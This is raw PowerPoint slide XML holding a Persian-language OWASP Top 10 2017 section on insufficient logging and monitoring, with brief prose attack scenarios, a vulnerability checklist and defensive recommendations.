                        <a:t>در حالی که برخی از آسیب پذیری های شناخته شده منجر به تاثیرات جزئی می شوند، برخی از بزرگترین رخنه ها تا به امروز به بهره برداری از آسیب پذیری شناخته شده در قطعات تکیه</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> کرده اند</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>. بسته به دارایی که محافظت می کنید، شاید نیاز باشد این ریسک در بالای لیست قرار گیرد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌ سناریوهای حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک نرم افزار انجمن منبع باز که توسط یک تیم کوچک اجرا می شد با استفاده از یک نقص در نرم افزار آن هک شد. مهاجمان موفق به از بین بردن منبع کد داخلی حاوی نسخه بعدی و تمامی محتویات انجمن شدند. اگرچه این منبع کد قابل بازیابی است، اما فقدان نظارت، عدم ثبت رویداد و عدم هشدار دادن منجر به نقص بسیار بدتری شد. پروژه نرم افزاری انجمن در نتیجه این موضوع دیگر فعال نیست.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک مهاجم کاربران را با استفاده از گذرواژه معمولی اسکن می کند. آنها می توانند با استفاده از این گذرواژه تمام حساب ها را در اختیار بگیرند. برای همه کاربران دیگر، این اسکن فقط یک ورود ناموفق به نظر می رسد. پس از چند روز، این کار ممکن است با یک گذرواژه متفاوت تکرار شود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک خرده فروش بزرگ آمریکایی گزارش داده است که یک سندباکس تحلیل بدافزار را تحلیل پیوست می کند. برنامه سندباکس به طور بالقوه برنامه ناخواسته را شناسایی کرده بود، اما هیچکس به این کشف واکنشی نشان نداد. قبل از اینکه نفوذ به دلیل تراکنش های کارت اعتباری توسط یک بانک خارجی شناسایی شود، سندباکس چندین مرتبه هشدار داده بود. </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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا برنامه کاربردی آسیب‌پذیر است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ثبت سیاهه، تشخیص، نظارت و پاسخ فعال ناکافی در هر زمان رخ می دهد:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="3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رویداد های قابل بررسی، از قبیل ورود به سیستم</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ورود ناموفق به سیستم و تراکنش های با ارزش بالا در سیستم ثبت نشده اند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="3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هشدارها و اشتباهات موجب ایجاد پیام های رویداد نامشخص، پیام های نامناسب یا غیرقابل تعریف می شود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="3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سیاهههای مربوط به برنامه ها و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها برای فعالیت مشکوک نظارت نمی شود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="3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سیاهه ها فقط به صورت محلی ذخیره می شوند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="3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آستانه های مربوط به هشدار و فرآیندهای تشدید پاسخ مناسب یا موثر نیستند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="3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تست نفوذ و اسکن با ابزارهای </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DAST (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> مانند  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>OWASP ZAP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>باعث هشدار نمی شود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="3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برنامه قادر به تشخیص، تشدید شدن یا هشدار برای حملات فعال در زمان واقعی یا نزدیک به زمان واقعی نیست.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شما به علت نشت اطلاعات آسیبپذیر هستید، اگر سیاهه وقایع و هشدارها قابل مشاهده برای یک کاربر و یا یک فرد باشد. (نگاه کنید به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>A3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: ۲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>017-Sensitive Information Exposure).</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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</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fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId7"/>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پیشگیری از حمله</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>همانطور که در مورد خطر اطلاعات ذخیره شده یا پردازش شده توسط برنامه داریم:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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اطمینان حاصل کنید که تمام ورودی ها به سیستم، خطاهای کنترل دسترسی و شکست های اعتبار سنجی ورودی طرف سرور می توانند با زمینه کاربری کافی برای شناسایی حساب های مشکوک یا مخرب ثبت کرد و زمان کافی را برای اجازه دادن تجزیه و تحلیل قانونی به تاخیر انداخت.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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اطمینان حاصل کنید که سیاهه هادر یک فرمت و قالبی تولید میشود که می تواند به راحتی توسط یک راه حل مدیریت رویداد متمرکز مورد استفاده قرار گیرد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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اطمینان از اینکه تراکنش های با ارزش بالا، دارای یک دنباله حسابرسی با کنترلهای یکپارچه برای جلوگیری از دستکاری یا حذف، مانند جداول پایگاه داده اضافه یا مشابه آن است.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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ایجاد نظارت مؤثر و هشدار به طوری که فعالیت های مشکوک به موقع شناسایی و پاسخ داده شود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ایجاد و یا اتخاذ یک پاسخ تصادفی و برنامه ریکاوری، مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا بالاتر.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>چارچوب های حفاظت از نرم افزارهای تجاری و منبع باز مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>فایروال های وب کاربردی مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>با </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> Core Rule Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> و نرم افزار همبسته‌سازی سیاهه  با داشبورد های سفارشی و هشدار وجود دارد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نظارت و ثبت سیاهه ناکافی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3300646651"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="23496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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
